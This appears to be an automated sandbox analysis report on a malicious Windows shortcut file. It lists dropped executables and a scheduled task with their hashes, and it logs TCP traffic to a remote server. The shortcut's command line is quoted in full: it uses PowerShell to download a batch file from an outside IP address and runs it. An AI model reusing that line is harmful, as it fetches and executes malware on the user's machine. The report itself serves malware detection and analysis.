                                        SHA1:EFC7534BCB1645D4056702E073519F571D8DB77B
                                        SHA-256:F919A8E63EC0F2F05AC01A6CAB4088C13FBF14A38B071CFA9F710C9E069462EB
                                        SHA-512:8F28867B46DD7A801CBF70D8D7FE5F2BFB8654A417C40BA264FAF81AF8BB1A28E1A1200FDC9828A4A4C6DF0A13817055290C16F9468D311B8D8049A2439348D9
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<..~x..-x..-x..-_4.-...-_4.-m..-x..-...-q.X-a..-q.N-...-q.I-...-f.I-{..-q.G-v..-q._-y..-f.Y-y..-q.\-y..-Richx..-........PE..L......e...........!.....f...........I....................................................@.............................O... ................................p...&.................................. ...@...............(.......@....................text....e.......f.................. ..`.rdata..............j..............@..@.data...t~.......$..................@....rsrc...............................@..@.reloc..Rq...p...r..................@..B................................................................................................................................................................................................................................................................................................................

                                        C:\Users\user\DZIPR.exe

                                        Download File
                                        Process:C:\Users\user\AppData\Roaming\AUGUST.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):8767704
                                        Entropy (8bit):7.112848215947183
                                        Encrypted:false
                                        SSDEEP:196608:zoR6Nv4zX/hW/7vpqCv3wrwxd8Sr3a8i5ynKVrzzky9WD9rrBrIrrsSrCrbrCrr+:6SAzXQjkCv3wrwxd8Sr3a8i5ynKVrzzq
                                        MD5:EC9CE1D67F98072281015C7726FBA245
                                        SHA1:E89B16265ACF4A251B527DDF22830F2650987263
                                        SHA-256:9AB4145D5525AE741B80F4E66F505ABBA59ADCBE01868DFEF84FBE4450634CC1
                                        SHA-512:21DB8F3AE325021589DE9C2489AB2CE6814722A17A92476A56147478AA9767CE5C4769169F287060CC08AD76019178BA547FCEF32074EF1AFB1926845E7158E1
                                        Malicious:true
                                        Yara Hits:
                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\DZIPR.exe, Author: Joe Security
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.../..e..................J...;.......J...... J...@.............................................@............................L..F....R...3..............(....M.@.............................L.....................,.L.......L......................text.....I.......I................. ..`.itext..l+....I..,....I............. ..`.data........ J.......J.............@....bss..........K.......K..................idata...F....L..H....K.............@....didata.......L.......L.............@....tls....@.....L...... L..................rdata........L...... L.............@..@.reloc..@.....M......"L.............@..B.rsrc.....3...R...3...Q.............@..@....................................@..@........................................................

                                        C:\Users\user\ekqqtq

                                        Download File
                                        Process:C:\Users\user\AppData\Roaming\AUGUST.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):975374
                                        Entropy (8bit):7.888212877886324
                                        Encrypted:false
                                        SSDEEP:24576:uLAGNVG5bTGfhtqkZEgJUyAre0DnrDJLJ1IC:KTp/qkqIArtHJd1IC
                                        MD5:4649F3A4E58C6040B07F6D486C149A71
                                        SHA1:64F8FC631C5FB4E5F6BC20C207047D8E2B500587
                                        SHA-256:5D81CA77492946AA2CFE00349342DE8CCEB317D8649BEDBFD95992DCA885F184
                                        SHA-512:4E1B229D30403B594E992FE0893E568161C8D901FE20461093D11159AB03B5DD410D1834BC64AC4CCC39D4F6B072946703F06EEB982D79B1C9A1B773B57013B7
                                        Malicious:false
                                        Preview:...\.L..s..J....evCX.u..qPZdT.U.pkvFSh.kJ......gu.....u...P.^O....Eg]j.t^x.JEw..U.E`^.xh.B...r........Iw.....BK..h..Pa..c.apT.F...si...Ww.Z..u.ydFAq`.TJ.G....vY`u.b....i.Z.Z.Kx..q.UP.OR.m..e.....yF..b..R.r...]s...t......g.Q..j.ekUYeV._.^F.a..B_b..d..[.Tcy....q...Y.K.Hc..W....\cdo..[jrL.vfXR_SQ.g...[....efMX..cjVl.....x.fX.NR...^..ysky..t.iD.J..TE.........w.q....f..hA..m...._.Z.k.A....Z.QCF^.UL.X..j.....`PJ..m......dlUkvE.P...jNo.W.c..Mp.v.d.G..PTkSW....iMXN.k.].....JIm..._.[.Wpb.a....C...oY...hB..ut..U.c..Ig]G.`..n....XV.qe.D...RxKT....^.wF]On.m....t.....TlESv.^Af.......M.K\....R.O.xLq.wCX.....NxHK...f...w.t.i........s.....W.x.\....[.p....bY...n....BO...W..Kc..bbO..q...`.c..Zay.i.EnZ..p...MIDQAbIt..N.yy..C...st.a.eZL...L..VYLoo.ZdAy[....ji.IpcvtNd........^g..e.Ekk..t...w.h.KtPgKl...[.J._D._.nr.ZF..Nuj...OnQ..HgG..I..xFK...Q`.A.....M....tt...Ja.K..L.j...s......ir...FT....e.Q.W...v.I.Nb.c.oGnNVCV.ojf.x...UoW.X.y...g.o.HrdM.Cga..WyJ..u.xd.AEcf.I..._._t..t.n.np..`W.GC....i..JJ...[`SVUqh...

                                        C:\Users\user\ipqtwm

                                        Download File
                                        Process:C:\Users\user\AppData\Roaming\AUGUST.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):72329
                                        Entropy (8bit):4.4816230098296295
                                        Encrypted:false
                                        SSDEEP:1536:wwBU0cfQiZJyld+smk3i92UcmUTY4bBc/UVoVJnaDa:wAU0niZJMtXi9yx84Fc/UaJnaDa
                                        MD5:F125E72B3968CA233EF3C7E2F4DB34E7
                                        SHA1:4FB34044EF18CEDBD3EDE4272C44416D3F11735C
                                        SHA-256:CED30560C6C0FC15CBDBDBC0D480DCA6B41CE3183057E43B419DD6814A33DB92
                                        SHA-512:B645D1EB685A69B9CA9BBDB1F4638AF8AE151DDFB9527C423F7779971246ED60F981CE26CE8AF2FC7B63164E7C13E9C6E98A7F148831A1E59318E60E5A39F881
                                        Malicious:false
                                        Preview:]dQ.cK.HM.oxC.bO].mQB...L.hHK....W..baW...f`kn.F.Iq.InDbX.M.J.W.CQF.]..M.....G.......J.GN......r.xZE.w.LP...h.[gx.cGq..ej..iQ.I...Q..V.....A.N..kX...ru..w.ZsOSBK..O...F..D...\Mh.q......`MjE.v...W.i.edA....UZ.x.Pf...Y.S.X...DQSG..y..GF..SD...y.pHM...mIE...].rY.jmZ.wA...eNnuh...jk.N.TI.s..W..M...xrSwCYKVq..Uf[r..Mm.uR......U.]..M.VobY...V.A.H_r....b\a..x.r.aj.P..r.O..ik.....]Lf.Ei..S..D...d.........qR..Aw.Q.QH..b...p.Of..v.p..]..t...g.lg.HD.g...O..K.CKj._...vI..Wu.sPu..PDPZ.\vvw.b...sQ.M.^.B..X...r.f.....ja..j..k.p.\J.UVg...S_Zq.c....I..hN[f..A.F_..WY.]Qr...YL.co.Y......I.......O...jG.Q.x]pp_.u^Vr..iiI..L_..SyWf`nr.b.`..e.Hm...B....y...Y.....d....qFUg.Ma..uPB_\.\..f..i..jE.v.....uxRV..[aM.l.Y..NT...vbef...bBcsRs.jW...pH.`B.FVL^.......y.....Z.....W...._eu..W.P...FYX.d..CE..dxg.....F.b^...MfysH...q.k..^..l....M...wqX.M`...B[..WN.]..M.......A.U.ZX[.n]........xTup...^y.nUgpcx..iu.`.Rv].i\b..UIwA..M..TQ.T.F...jA..p..VI.m.R..Va...V.P.H..y..vhjr....l..oZ.....[y.b.O.FA.c.DEQ]..n.ZU.Dt[Z.O.T.]...

                                        C:\Windows\Tasks\lnfast_x64.job

                                        Download File
                                        Process:C:\Windows\SysWOW64\cmd.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):298
                                        Entropy (8bit):3.551464552546624
                                        Encrypted:false
                                        SSDEEP:6:V5iF88fuXUEZglJPZOjzkjTtE9+AQy0lb0emQP1:VEGmuMJsX9+nVwemQt
                                        MD5:97FC0491F14E6206BAEF1D398606C19D
                                        SHA1:8660D9D3E15C4CACCA44AE3CAEA033B338F51D23
                                        SHA-256:A9BA5A9E4DA4402C7D9390FC8A20CABADEB0D73872A2D30A49054EE5036446E3
                                        SHA-512:FE741A2B476B695939CABCF4840AA4254F4D0C1FB90E763CD62C24CF563CF64452898ED91E5485E24CBA081960FE4DADC85133A18B4D0A4696D0239BF4D107DF
                                        Malicious:false
                                        Preview:.....q.,..D..W.....F.......<... ................ ....................9.C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.R.u.y._.d.r.i.v.e.r.v.2.\.D.Z.I.P.R...e.x.e.........E.N.G.I.N.E.E.R.-.P.C.\.e.n.g.i.n.e.e.r...................0.........h.......(.............................

                                        Static File Info

                                        General

                                        File type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has command line arguments, Icon number=1, Archive, ctime=Mon Aug 26 12:29:30 2024, mtime=Mon Aug 26 12:29:30 2024, atime=Mon Aug 26 12:29:30 2024, length=278528, window=hidenormalshowminimized
                                        Entropy (8bit):4.444274641492051
                                        TrID:
                                        • Windows Shortcut (20020/1) 100.00%
                                        File name:Dlr7HYI6VL.lnk
                                        File size:1'389 bytes
                                        MD5:383bec1808c99dcffafa9f4e03f104a4
                                        SHA1:2f3647ea4331f7848de1c96cef6427b7136ab835
                                        SHA256:be386e82648d80bd602030f57e67a94834f945efd92293ab660e561b22c3e850
                                        SHA512:ddb859691e290bb1f4180c086ca92d385918f497506b1b9dc0b1f10b71acb24259b34020b032fb25af64a3ba628e423381106a538e7539f8d9c2617cee11c617
                                        SSDEEP:24:8GJdPVzSPFA21SGfUvAY4I0WxwQ13idyD11BabQvORhtC/5:8yNzAuD0Id13iyD11Baj
                                        TLSH:2C21D00967EB8235D2B7993A6D9AE715DB10FC4297438F5B05D4514EBC13211A418F1B
                                        File Content Preview:L..................F.... ...........J.......J........@......................5....P.O. .:i.....+00.../C:\...................V.1.....2Ye...Windows.@......./M.12Ye............................c9.W.i.n.d.o.w.s.....Z.1.....8Y\@..System32..B......./M.18Y\@......

                                        File Icon

                                        Icon Hash:74f4d4dcdcc9e1ed

                                        Static Windows Shortcut Info

                                        General

                                        Relative Path:
                                        Command Line Argument:/c powershell wget http://172.94.3.25/hello.bat -OutFile %APPDATA%/hello.bat && %APPDATA%/hello.bat
                                        Icon location:%SystemRoot%\System32\SHELL32.dll

                                        Network Behavior

                                        Network Port Distribution

                                        TCP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Sep 25, 2024 18:40:19.811681032 CEST4971280192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:19.816627026 CEST8049712172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:19.816692114 CEST4971280192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:19.820483923 CEST4971280192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:19.825248957 CEST8049712172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:20.474911928 CEST8049712172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:20.523516893 CEST4971280192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:20.528848886 CEST4971280192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:21.185259104 CEST4971380192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:21.190195084 CEST8049713172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:21.190282106 CEST4971380192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:21.193124056 CEST4971380192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:21.197845936 CEST8049713172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:21.857218027 CEST8049713172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:21.898555994 CEST4971380192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:22.006005049 CEST8049713172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:22.054759979 CEST4971380192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:22.072935104 CEST4971380192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:23.187403917 CEST4971480192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:24.058516979 CEST8049714172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:24.060535908 CEST4971480192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:24.072037935 CEST4971480192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:24.076921940 CEST8049714172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:24.737482071 CEST8049714172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:24.789138079 CEST4971480192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:24.791584015 CEST4971480192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:27.127707958 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:27.132641077 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:27.132719994 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:27.133619070 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:27.138457060 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:27.767301083 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:27.767319918 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:27.767332077 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:27.767381907 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:27.767426968 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:27.767441034 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:27.767471075 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:27.767757893 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:27.767770052 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:27.767784119 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:27.767796993 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:27.767805099 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:27.767808914 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:27.767822981 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:27.767853975 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:27.774641037 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:27.820427895 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:27.843009949 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:27.843027115 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:27.843039036 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:27.843094110 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:27.853413105 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:27.853436947 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:27.853450060 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:27.853478909 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:27.853486061 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:27.853497982 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:27.853527069 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:27.853549004 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:27.853811979 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:27.853873968 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:27.853885889 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:27.853897095 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:27.853918076 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:27.853935957 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:27.854435921 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:27.854540110 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:27.854552984 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:27.854578018 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:27.854644060 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:27.854677916 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:27.855038881 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:27.855094910 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:27.855106115 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:27.855129004 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:27.855148077 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:27.855159998 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:27.855181932 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:27.855925083 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:27.855988026 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:27.936589956 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:27.955637932 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:27.955677986 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:27.955691099 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:27.955699921 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:27.955703020 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:27.955738068 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:27.955873013 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:27.955884933 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:27.955929041 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:27.966757059 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:27.966794014 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:27.966808081 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:27.966813087 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:27.966836929 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:27.966850042 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:27.966851950 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:27.966865063 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:27.966876984 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:27.966887951 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:27.966892004 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:27.966903925 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:27.966917038 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:27.966917992 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:27.966953993 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:27.966953993 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:27.967003107 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:27.967628002 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:27.967680931 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:27.967691898 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:27.967719078 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:27.967778921 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:27.967789888 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:27.967803001 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:27.967816114 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:27.967818022 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:27.967847109 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:27.968610048 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:27.968636990 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:27.968651056 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:27.968651056 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:27.968689919 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:27.968703032 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:27.968714952 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:27.968727112 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:27.968739986 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:27.968765020 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:27.968794107 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:27.969604015 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:27.969618082 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:27.969633102 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:27.969655991 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:27.969758987 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:27.969770908 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:27.969783068 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:27.969798088 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:27.969799995 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:27.969818115 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:27.970601082 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:27.970616102 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:27.970628977 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:27.970644951 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:27.970645905 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:27.970669985 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.023547888 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.044656992 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.044713974 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.044734001 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.044751883 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.044770002 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.044787884 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.044806957 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.044819117 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.044825077 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.044846058 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.044976950 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.055088997 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.055156946 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.055191994 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.055195093 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.055222034 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.055227995 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.055253029 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.055282116 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.055289030 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.055313110 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.055341959 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.055344105 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.055372000 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.055407047 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.055452108 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.055489063 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.055529118 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.055727005 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.055757999 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.055788040 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.055792093 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.055849075 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.055883884 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.055907965 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.055938005 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.055974007 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.055978060 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.056008101 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.056042910 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.056374073 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.056404114 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.056435108 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.056438923 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.056494951 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.056524038 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.056530952 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.056555033 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.056585073 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.056587934 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.057001114 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.057029963 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.057035923 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.057060957 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.057095051 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.057221889 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.057267904 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.057298899 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.057306051 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.057408094 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.057447910 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.057454109 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.057485104 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.057512999 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.057519913 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.057543039 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.057571888 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.057576895 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.057604074 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.057638884 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.058073997 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.058124065 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.058159113 CEST4971680192.168.2.6172.94.3.25
                                        Sep 25, 2024 18:40:28.058171988 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.058202028 CEST8049716172.94.3.25192.168.2.6
                                        Sep 25, 2024 18:40:28.058231115 CEST8049716172.94.3.25192.168.2.6
